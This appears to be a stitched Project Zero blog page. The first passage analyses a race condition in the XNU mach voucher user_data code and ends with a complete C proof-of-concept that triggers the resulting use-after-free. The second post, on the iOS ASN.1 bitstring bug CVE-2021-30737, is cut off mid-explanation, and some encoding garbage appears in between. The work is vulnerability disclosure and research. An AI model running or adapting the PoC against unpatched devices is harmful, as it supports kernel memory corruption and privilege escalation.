We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

        for (i = 0; i < iv->iv_table_size; i++) {

                ivace_release(i, iv->iv_table[i]);

        }

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

        iv_index_t key_index,

        iv_index_t value_index)

{

...

        ivgt_lookup(key_index, FALSE, &ivam, &ivac);

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(0 < ivace->ivace_refs);

        /* cant release persistent values */

        if (ivace->ivace_persist) {

                ivac_unlock(ivac);

                return;

        }

        if (0 < --ivace->ivace_refs) {

                ivac_unlock(ivac);

                return;

        }

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

        key = iv_index_to_key(key_index);

        assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

        /*

         * if last return reply is still pending,

         * let it handle this later return when

         * the previous reply comes in.

         */

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

        /* claim releasing */

        ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

        value = ivace->ivace_value;

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

        ipc_voucher_attr_manager_t              __assert_only manager,

        mach_voucher_attr_key_t                 __assert_only key,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_reference_t     sync)

{

        user_data_element_t elem;

        iv_index_t hash;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        elem = (user_data_element_t)value;

        hash = elem->e_hash;

        user_data_lock();

        if (sync == elem->e_made) {

                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

                user_data_unlock();

                kfree(elem, sizeof(*elem) + elem->e_size);

                return KERN_SUCCESS;

        }

        assert(sync < elem->e_made);

        user_data_unlock();

        return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_free_value let's look back at the callsite:

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

                if (KERN_SUCCESS != kr) {

                        ivace->ivace_releasing = FALSE;

                        ivac_unlock(ivac);

                        return;

                }

        }

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

    mach_port_t voucher = MACH_PORT_NULL;

    kern_return_t kr = host_create_mach_voucher(

            mach_host_self(),

            (mach_voucher_attr_raw_recipe_array_t)recipe,

            recipe_size,

            &voucher);

    if (kr != KERN_SUCCESS) {

        printf("failed to create voucher from recipe\n");

    }

    return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    *template_size_out = recipe_size;

    return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

   

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

    recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

    *template_size_out = recipe_size;

    return recipe;

}

struct recipe_template_meta {

    void* recipe;

    size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

    struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

    for (int i = 0; i < iter_limit; i++) {

        mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

        mach_port_deallocate(mach_task_self(), voucher_port);

    }

    return NULL;

}

void sploit_3() {

    while(1) {

        // choose a userdata size:

        uint32_t userdata_size = (arc4random() % 2040)+8;

        userdata_size += 7;

        userdata_size &= (~7);

        printf("userdata size: 0x%x\n", userdata_size);

        uint8_t* userdata_buffer = calloc(userdata_size, 1);

        ((uint32_t*)userdata_buffer)[0] = arc4random();

        ((uint32_t*)userdata_buffer)[1] = arc4random();

        // build the templates:

        single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

        redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

        free(userdata_buffer);

        pthread_t single_recipe_thread;

        pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

        pthread_t redeem_recipe_thread;

        pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

        pthread_join(single_recipe_thread, NULL);

        pthread_join(redeem_recipe_thread, NULL);

        free(single_recipe_template.recipe);

        free(redeem_recipe_template.recipe);

    }

}

int main(int argc, char** argv) {

    sploit_3();

}

‚úáGoogle Project Zero

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

By: Ryan ‚ÄĒ

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as an quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of text. Transcript: Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Impact: Processing a maliciously crafted certification may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

         PORT_ArenaRelease(cx->our_pool, state->our_mark);

         state->our_mark = NULL;

     }

-    if (new_state != NULL) {

-        PORT_Free(new_state);

-    }

     return NULL;

 }

 

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if ((state->pending == 0) || (state->contents_length == 1)) {

+    if (state->pending == 0) {

                if (state->dest != NULL) {

                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);

                        item->Data = NULL;

                        item->Length = 0;

                        state->place = beforeEndOfContents;

-               }

-               if(state->contents_length == 1) {

-                       /* skip over (unused) remainder byte */

-                       return 1;

-               }

-               else {

-                       return 0;

+            return 0;

                }

     }

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 1 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 0 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0 , which is encoded as two NULL bytes.

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

  {

    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

                                         //  may be constructed

    0,     // offset: in dest/src

    NULL,  // sub: subtemplate for indirection

    sizeof(SecAsn1Item) // size: of output structure

  }

};

A SecASN1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

  SEC_ASN1Decode(pool,     // pool: arena for destination allocations

                 &decoded, // dest: decoded encoded items in to here

                 &simple_bitstring_template, // template

                 asn1_bytes,      // buf: asn1 input bytes

                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

  SEC_ASN1DecoderContext *top; 

  const SecAsn1Template *theTemplate;

  void *dest;

 

  struct sec_asn1d_state_struct *parent;

  struct sec_asn1d_state_struct *child;

 

  sec_asn1d_parse_place place;

 

  unsigned long contents_length;

  unsigned long pending;

  unsigned long consumed;

  int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

‚Äč‚Äčtypedef¬†enum¬†{

    beforeIdentifier,

    duringIdentifier,

    afterIdentifier,

    beforeLength,

    duringLength,

    afterLength,

    beforeBitString,

    duringBitString,

    duringConstructedString,

    duringGroup,

    duringLeaf,

    duringSaveEncoding,

    duringSequence,

    afterConstructedString,

    afterGroup,

    afterExplicit,

    afterImplicit,

    afterInline,

    afterPointer,

    afterSaveEncoding,

    beforeEndOfContents,

    duringEndOfContents,

    afterEndOfContents,

    beforeChoice,

    duringChoice,

    afterChoice,

    notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {

    case beforeIdentifier:

      consumed = sec_asn1d_parse_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case duringIdentifier:

      consumed = sec_asn1d_parse_more_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case afterIdentifier:

      sec_asn1d_confirm_identifier (state);

      break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;

  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf which copies the raw encoded string bytes for example simply memcpy's into the output buffer with no bounds checks that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

